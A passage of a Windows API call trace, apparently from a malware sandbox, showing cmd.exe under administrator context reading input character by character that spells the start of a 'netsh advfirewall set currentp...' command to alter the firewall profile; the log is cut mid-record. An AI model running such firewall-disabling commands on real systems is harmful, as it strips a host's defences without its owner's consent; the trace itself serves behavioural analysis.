_BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cfc18 | out: _Buffer="\r\n") returned 2 [0046.729] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.729] GetFileType (hFile=0xfc) returned 0x3 [0046.729] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.729] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.729] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfbe8*=0x2, lpOverlapped=0x0) returned 1 [0046.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0046.729] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0046.729] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0046.729] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0046.729] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.729] GetFileType (hFile=0x98) returned 0x3 [0046.729] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0046.729] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x2cfa40 | out: TokenHandle=0x2cfa40*=0x0) returned 0xc000007c [0046.730] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x2cfa40 | out: TokenHandle=0x2cfa40*=0x50) returned 0x0 [0046.730] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x2cfa50, TokenInformationLength=0x4, ReturnLength=0x2cfa58 | out: TokenInformation=0x2cfa50, ReturnLength=0x2cfa58) returned 0x0 [0046.730] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x2cfa58, TokenInformationLength=0x4, ReturnLength=0x2cfa50 | out: TokenInformation=0x2cfa58, ReturnLength=0x2cfa50) returned 0x0 [0046.730] NtClose (Handle=0x50) returned 0x0 [0046.730] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x2cfa20, nSize=0x0, Arguments=0x2cfa28 | out: lpBuffer="\x97e0\x48") returned 0xf [0046.730] GetProcessHeap () returned 0x470000 [0046.730] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x471ab0 [0046.730] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.730] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0046.730] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0046.731] GetProcessHeap () returned 0x470000 [0046.731] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x471ab0 | out: hHeap=0x470000) returned 1 [0046.731] LocalFree (hMem=0x4897e0) returned 0x0 [0046.731] GetProcessHeap () returned 0x470000 [0046.731] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48aa10 | out: hHeap=0x470000) returned 1 [0046.731] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf758 | out: _Buffer="\r\n") returned 2 [0046.731] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.731] GetFileType (hFile=0xfc) returned 0x3 [0046.731] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.731] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.731] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf728, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cf728*=0x2, lpOverlapped=0x0) returned 1 [0046.731] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0046.731] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.731] _vsnwprintf (in: _Buffer=0x4a4beb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf768 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0046.731] _vsnwprintf (in: _Buffer=0x4a4bebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf768 | out: _Buffer=">") returned 1 [0046.731] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.731] GetFileType (hFile=0xfc) returned 0x3 [0046.731] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.731] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0046.731] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf758, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cf758*=0x26, lpOverlapped=0x0) returned 1 [0046.731] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.731] GetFileType (hFile=0x98) returned 0x3 [0046.731] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.732] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.732] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce320, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0046.732] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.732] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.732] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce322, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.732] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.732] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.732] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce324, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.732] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.732] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.732] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce326, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.732] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.732] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.732] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce328, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce32e, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce330, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce332, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce334, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0046.733] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.733] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.733] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce336, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce33e, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce340, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.734] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.734] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce342, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.734] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce344, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce346, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce348, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34a, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.735] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.735] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0046.735] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce350, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce352, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce354, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce356, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce358, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.736] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.736] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0046.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35a, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0046.736] _get_osfhandle (_FileHandle=0) returned 